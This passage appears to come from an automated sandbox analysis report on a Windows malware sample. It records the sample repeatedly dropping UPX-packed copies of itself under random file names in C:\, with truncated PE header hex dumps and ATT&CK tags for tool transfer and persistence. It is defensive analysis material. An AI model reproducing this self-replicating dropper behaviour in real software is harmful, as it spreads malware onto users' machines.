4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"06200.exe\" wrote 49259 bytes starting with PE header signature to file \"C:\\8288862.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8288862.exe\" wrote 49270 bytes starting with PE header signature to file \"C:\\0484046.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"0484046.exe\" wrote 49286 bytes starting with PE header signature to file \"C:\\tpjrfn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tpjrfn.exe\" wrote 49304 bytes starting with PE header signature to file \"C:\\drpdftl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"drpdftl.exe\" wrote 49319 bytes starting with PE header signature to file \"C:\\htpdr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"htpdr.exe\" wrote 49329 bytes starting with PE header signature to file \"C:\\frbnxt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"frbnxt.exe\" wrote 49349 bytes starting with PE header signature to file \"C:\\bfllh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"bfllh.exe\" wrote 49364 bytes starting with PE header signature to file \"C:\\hptntt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hptntt.exe\" wrote 49382 bytes starting with PE header signature to file \"C:\\vtrppln.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vtrppln.exe\" wrote 49394 bytes starting with PE header signature to file \"C:\\rdttflx.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rdttflx.exe\" wrote 49407 bytes starting with PE header signature to file \"C:\\ljvfrdn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ljvfrdn.exe\" wrote 49419 bytes starting with PE header signature to file \"C:\\ntjvt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ntjvt.exe\" wrote 49429 bytes starting with PE header signature to file \"C:\\lllfpll.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lllfpll.exe\" wrote 49446 bytes starting with PE header signature to file \"C:\\lxrhrth.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lxrhrth.exe\" wrote 49460 bytes starting with PE header signature to file \"C:\\nntvf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nntvf.exe\" wrote 49480 bytes starting with PE header signature to file \"C:\\806004.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"806004.exe\" wrote 49498 bytes starting with PE header signature to file \"C:\\4228006.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4228006.exe\" wrote 49508 bytes starting with PE header signature to file \"C:\\20402.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"20402.exe\" wrote 49528 bytes starting with PE header signature to file \"C:\\046644.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"046644.exe\" wrote 49543 bytes starting with PE header signature to file \"C:\\2820044.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2820044.exe\" wrote 49559 bytes starting with PE header signature to file \"C:\\8600684.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"8600684.exe\" wrote 49578 bytes starting with PE header signature to file \"C:\\2006628.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2006628.exe\" wrote 49590 bytes starting with PE header signature to file \"C:\\64860.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"64860.exe\" wrote 49601 bytes starting with PE header signature to file \"C:\\fpplvv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fpplvv.exe\" wrote 49621 bytes starting with PE header signature to file \"C:\\dpjjvjv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dpjjvjv.exe\" wrote 49632 bytes starting with PE header signature to file \"C:\\ttldj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"ttldj.exe\" wrote 49647 bytes starting with PE header signature to file \"C:\\tlbnpbh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tlbnpbh.exe\" wrote 49661 bytes starting with PE header signature to file \"C:\\hjjtjd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hjjtjd.exe\" wrote 49681 bytes starting with PE header signature to file \"C:\\rpbfjr.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rpbfjr.exe\" wrote 49692 bytes starting with PE header signature to file \"C:\\jrrhxbf.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"jrrhxbf.exe\" wrote 49707 bytes starting with PE header signature to file \"C:\\lfnjxdh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lfnjxdh.exe\" wrote 49718 bytes starting with PE header signature to file \"C:\\nbnxn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nbnxn.exe\" wrote 49734 bytes starting with PE header signature to file \"C:\\rhjvpvp.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"rhjvpvp.exe\" wrote 49745 bytes starting with PE header signature to file \"C:\\624082.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"624082.exe\" wrote 49764 bytes starting with PE header signature to file \"C:\\42004.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"42004.exe\" wrote 49775 bytes starting with PE header signature to file \"C:\\884228.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"884228.exe\" wrote 49792 bytes starting with PE header signature to file \"C:\\2628204.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"2628204.exe\" wrote 49812 bytes starting with PE header signature to file \"C:\\004802.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"004802.exe\" wrote 49822 bytes starting with PE header signature to file \"C:\\dllffdl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"dllffdl.exe\" wrote 49840 bytes starting with PE header signature to file \"C:\\tdbrbj.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"tdbrbj.exe\" wrote 49857 bytes starting with PE header signature to file \"C:\\pbnblrt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pbnblrt.exe\" wrote 49875 bytes starting with PE header signature to file \"C:\\vrjppt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vrjppt.exe\" wrote 49888 bytes starting with PE header signature to file \"C:\\prbhn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"prbhn.exe\" wrote 49902 bytes starting with PE header signature to file \"C:\\lfhtd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lfhtd.exe\" wrote 49913 bytes starting with PE header signature to file \"C:\\pxvdt.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"pxvdt.exe\" wrote 49931 bytes starting with PE header signature to file \"C:\\nxnhll.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"nxnhll.exe\" wrote 49950 bytes starting with PE header signature to file \"C:\\thvfh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"thvfh.exe\" wrote 49960 bytes starting with PE header signature to file \"C:\\020864.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"020864.exe\" wrote 49971 bytes starting with PE header signature to file \"C:\\84604.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"84604.exe\" wrote 49982 bytes starting with PE header signature to file \"C:\\044866.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"044866.exe\" wrote 49994 bytes starting with PE header signature to file \"C:\\624206.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"624206.exe\" wrote 50008 bytes starting with PE header signature to file \"C:\\040208.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"040208.exe\" wrote 50027 bytes starting with PE header signature to file \"C:\\xbbhhv.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"xbbhhv.exe\" wrote 50041 bytes starting with PE header signature to file \"C:\\fvjlh.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"fvjlh.exe\" wrote 50052 bytes starting with PE header signature to file \"C:\\frrtbb.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"rfbrlrh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"blpjp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vllrv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hpjbbfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4000248.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vptfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dvlvp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pdljr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"brvtdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2846688.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"488862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"06448.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vjrdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"tdplj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"02482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"86844.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"njnplr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jbvjrv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"djhxhx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rdtdhx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jhhhxxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"llfppf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hxfnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xtxdjfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2808244.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"04424.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"24442.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"802244.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"frrtbb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\frrtbb.exe]- [targetUID: 00000000-00004360]\n \"fvjlh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fvjlh.exe]- [targetUID: 00000000-00004360]\n \"xbbhhv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xbbhhv.exe]- [targetUID: 00000000-00002572]\n \"040208.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\040208.exe]- [targetUID: 00000000-00004588]\n \"624206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\624206.exe]- [targetUID: 00000000-00004576]\n \"044866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\044866.exe]- [targetUID: 00000000-00003824]\n \"84604.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\84604.exe]- [targetUID: 00000000-00000884]\n \"020864.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\020864.exe]- [targetUID: 00000000-00000884]\n \"thvfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\thvfh.exe]- [targetUID: 00000000-00000956]\n \"nxnhll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxnhll.exe]- [targetUID: 00000000-00000872]\n \"pxvdt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pxvdt.exe]- [targetUID: 00000000-00000872]\n \"lfhtd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lfhtd.exe]- [targetUID: 00000000-00001424]\n \"prbhn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\prbhn.exe]- [targetUID: 00000000-00001920]\n \"vrjppt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vrjppt.exe]- [targetUID: 00000000-00001920]\n \"pbnblrt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pbnblrt.exe]- [targetUID: 00000000-00003228]\n \"tdbrbj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tdbrbj.exe]- [targetUID: 00000000-00003164]\n \"dllffdl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dllffdl.exe]- [targetUID: 00000000-00002836]\n \"004802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\004802.exe]- [targetUID: 00000000-00002836]\n \"2628204.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2628204.exe]- [targetUID: 00000000-00001888]\n \"884228.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\884228.exe]- [targetUID: 00000000-00003248]\n \"42004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42004.exe]- [targetUID: 00000000-00003248]\n \"624082.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\624082.exe]- [targetUID: 00000000-00001844]\n \"rhjvpvp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhjvpvp.exe]- [targetUID: 00000000-00004020]\n \"nbnxn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nbnxn.exe]- [targetUID: 00000000-00004020]\n \"lfnjxdh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lfnjxdh.exe]- [targetUID: 00000000-00004524]\n \"jrrhxbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jrrhxbf.exe]- [targetUID: 00000000-00004236]\n \"rpbfjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rpbfjr.exe]- [targetUID: 00000000-00004236]\n \"hjjtjd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hjjtjd.exe]- [targetUID: 00000000-00003424]\n \"tlbnpbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tlbnpbh.exe]- [targetUID: 00000000-00003424]\n \"ttldj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ttldj.exe]- [targetUID: 00000000-00003692]\n \"dpjjvjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dpjjvjv.exe]- [targetUID: 00000000-00004124]\n \"fpplvv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fpplvv.exe]- [targetUID: 00000000-00004124]\n \"64860.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64860.exe]- [targetUID: 00000000-00003220]\n \"2006628.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2006628.exe]- [targetUID: 00000000-00002528]\n \"8600684.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8600684.exe]- [targetUID: 00000000-00003812]\n \"2820044.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2820044.exe]- [targetUID: 00000000-00003812]\n \"046644.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\046644.exe]- [targetUID: 00000000-00004140]\n \"20402.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\20402.exe]- [targetUID: 00000000-00001372]\n \"4228006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4228006.exe]- [targetUID: 00000000-00001372]\n \"806004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\806004.exe]- [targetUID: 00000000-00004472]\n \"nntvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nntvf.exe]- [targetUID: 00000000-00003668]\n \"lxrhrth.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxrhrth.exe]- [targetUID: 00000000-00003668]\n \"lllfpll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lllfpll.exe]- [targetUID: 00000000-00002736]\n \"ntjvt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ntjvt.exe]- [targetUID: 00000000-00004448]\n \"ljvfrdn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ljvfrdn.exe]- [targetUID: 00000000-00000852]\n \"rdttflx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rdttflx.exe]- [targetUID: 00000000-00000852]\n \"vtrppln.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vtrppln.exe]- [targetUID: 00000000-00004116]\n \"hptntt.exe\" has type 